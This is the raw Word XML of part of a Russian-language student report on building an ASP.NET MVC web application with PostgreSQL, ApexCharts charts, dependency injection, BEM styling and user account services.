        <w:t xml:space="preserve"> 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lastRenderedPageBreak/>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lastRenderedPageBreak/>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41553E9F"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00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>6</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Разработку проекта было решено реализовывать с помощью паттерна MVC.</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lastRenderedPageBreak/>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w:t>
      </w:r>
      <w:r w:rsidR="000A1EC6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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2F87C65E" w:rsidR="00E258B2"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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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r w:rsidR="008C1A5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApexCharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA5706" w:rsidRPr="00BD5112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00AA5706" w:rsidRPr="00BD5112">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00BD5112">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F" w:rsidRPr="008C1A5F">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4" w:rsidRPr="001F2AD4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:t xml:space="preserve">Одним из других рассматриваемых вариантов была рассмотрена библиотека </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rechart</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4" w:rsidRPr="001F2AD4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:t xml:space="preserve">но для того, чтобы пользоваться этой библиотекой необходимо дополнительные знания технологии </w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>React</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4" w:rsidRPr="001F2AD4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C77083">
        <w:t xml:space="preserve">. Также была рассмотрена библиотека </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C77083">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FusionCharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C77083" w:rsidRPr="00C77083">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C77083">
        <w:t>она также хорошо задокументирована и имеет все необходимы графики для потребностей заказчика, но данная библиотека является платной, оплата производится по подписочной системе. О</w:t>
      </w:r>
      <w:r w:rsidR="001F2AD4">
        <w:t xml:space="preserve">тображение графиков было решено реализовать с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F2AD4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApexCharts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F2AD4">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27EA5CD6" w14:textId="77777777" w:rsidR="00E258B2" w:rsidRDefault="00E258B2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="122622D6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="002F75C4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc161568213"/>
      <w:bookmarkStart w:id="36" w:name="_Toc162709239"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4 Программирование веб-сервера</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3DB0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>графического пользовательского интерфейса и базы данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13346C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="007B3DB0">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc161568214"/>
      <w:bookmarkStart w:id="38" w:name="_Toc162709240"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>4.1 Аппаратное обеспечение проекта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="67CEF46A" w14:textId="33F38D18"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w:t>
      </w:r>
      <w:r w:rsidR="00E258B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00BD5112">
        <w:t>[18]</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w:t>
      </w:r>
      <w:r w:rsidR="003629E8">
        <w:lastRenderedPageBreak/>
        <w:t>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F73005" w:rsidRDefault="0093378B" w:rsidP="00CF5577">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc161568215"/>
      <w:bookmarkStart w:id="40" w:name="_Toc162709241"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>4.2 Программное обеспечение проекта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>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lastRenderedPageBreak/>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7F632D7" w:rsidR="0093378B" w:rsidRDefault="001F04F3" w:rsidP="00112241">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B065E3A" wp14:editId="645F6793">
            <wp:extent cx="5038848" cy="37528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4063" cy="3756734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A872EE5" w14:textId="5EB8EF52" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>20</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77C20A55" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1ED592" w14:textId="3BE6B41E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00646613">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BF681E">
        <w:t>параграфе (</w:t>
      </w:r>
      <w:r w:rsidR="00BF681E" w:rsidRPr="00BF681E">
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="00BF681E">
        <w:t>) на рисунке (</w:t>
      </w:r>
      <w:r w:rsidR="00BF681E" w:rsidRPr="00BF681E">
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidR="009F0403" w:rsidRPr="00BF681E">
        <w:t>)</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1519C576" w14:textId="77777777" w:rsidR="004A1170" w:rsidRDefault="004A1170" w:rsidP="00112241"/>
    <w:p w14:paraId="42E9A925" w14:textId="69134802" w:rsidR="00295BB1"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23BE6F63" w14:textId="77777777" w:rsidR="00295BB1" w:rsidRDefault="00295BB1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB5CC9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112241"/>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r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>channel1</w:t>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7F4D7C1C" w14:textId="77777777" w:rsidR="00F14744" w:rsidRDefault="00F14744" w:rsidP="003E3F21"/>
    <w:p w14:paraId="1611F3E6" w14:textId="685A453E" w:rsidR="00295BB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возможностями</w:t>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 xml:space="preserve">Описание данных приведено в таблице </w:t>
      </w:r>
      <w:r w:rsidR="00F14744">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F45B2" w14:textId="77777777" w:rsidR="00295BB1" w:rsidRDefault="00295BB1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E975D6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="003E3F21" w:rsidRDefault="0093378B" w:rsidP="003E3F21"/>
    <w:p w14:paraId="49C675ED" w14:textId="52BF7881" w:rsidR="0093378B" w:rsidRPr="00EC10A8" w:rsidRDefault="0093378B" w:rsidP="003E3F21">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00F14744">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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0998D170" w14:textId="77777777" w:rsidR="004A1170" w:rsidRDefault="004A1170" w:rsidP="003E3F21"/>
    <w:p w14:paraId="629C4B32" w14:textId="18B8EE40"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t xml:space="preserve">поддерживаемые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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>appsettings.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ключевым объектом в концепции внедрения зависимостей в данном примере является интерфейс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>MeasurementRepository.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> 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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>ApplicationDbContext.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, который наследуется от базового стандартного класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>DbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">содержится конструктор и свойство </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>DbSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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1F04F3">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApplicationDbContex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lastRenderedPageBreak/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HomeController.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F14744" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>GetTable.cshtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6628">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">расширение </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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4A1170">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4A1170">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidR="008353F2" w:rsidRPr="004A1170">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A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>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4A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>GetTable.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F14744" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>@{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6896A3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="007C3C24" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>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lastRenderedPageBreak/>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F14744" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Данных</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>за</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>выбранную</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>дату</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>нет</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3C24">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D67445" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="007C3C24">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>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F14744" w:rsidRDefault="0093378B" w:rsidP="00061001">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14744">
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14744">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Program.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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18A30972" w14:textId="7A0121F7" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E662A4">
      <w:r>
        <w:lastRenderedPageBreak/>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17AB770" w14:textId="4CA8241B" w:rsidR="0093378B" w:rsidRDefault="00A15631" w:rsidP="002747E5">
      <w:r>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t xml:space="preserve">аблица из пользовательского графического интерфейса соответствует структуре, и тем данным, что содержатся в </w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidR="0093378B" w:rsidRPr="002747E5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t>Операция визуализации данных посредством реализации архитектурного решения «внедрение зависимостей» проведена успешно.</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0678FEBF"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 xml:space="preserve">файлах, код представлен в Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>А</w:t>
      </w:r>
      <w:r>
        <w:t>.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lastRenderedPageBreak/>
        <w:t>запроса, и в конечном итоге в этом методе обрабатываются данные из параметра для обновления или отрисовки графиков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C56689" w14:textId="3DA3ACE2" w:rsidR="001F4989" w:rsidRPr="001F4989" w:rsidRDefault="001F4989" w:rsidP="001F4989">
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve">Для обеспечения удобства расширения и переработки пользовательского интерфейса в </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t xml:space="preserve"> в проекте используется методология «БЭМ»</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>[19]</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>. БЭМ (Блок, элемент, модификатор) – это компонентный подход к веб</w:t>
      </w:r>
      <w:r w:rsidR="00332DCA">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:t>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w:t>
      </w:r>
      <w:r w:rsidRPr="001F4989">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(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определяющий стили для кнопок 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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Такой интерфейс описан в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IAccountService.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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049A76B4"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4A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IAccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AccountService.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и предоставлена в Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Б</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Также стоит отметить, что при создании и авторизации пользователей используется метод </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>HashPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">который находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>HashPassword.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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4A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>AccountController</w:t>
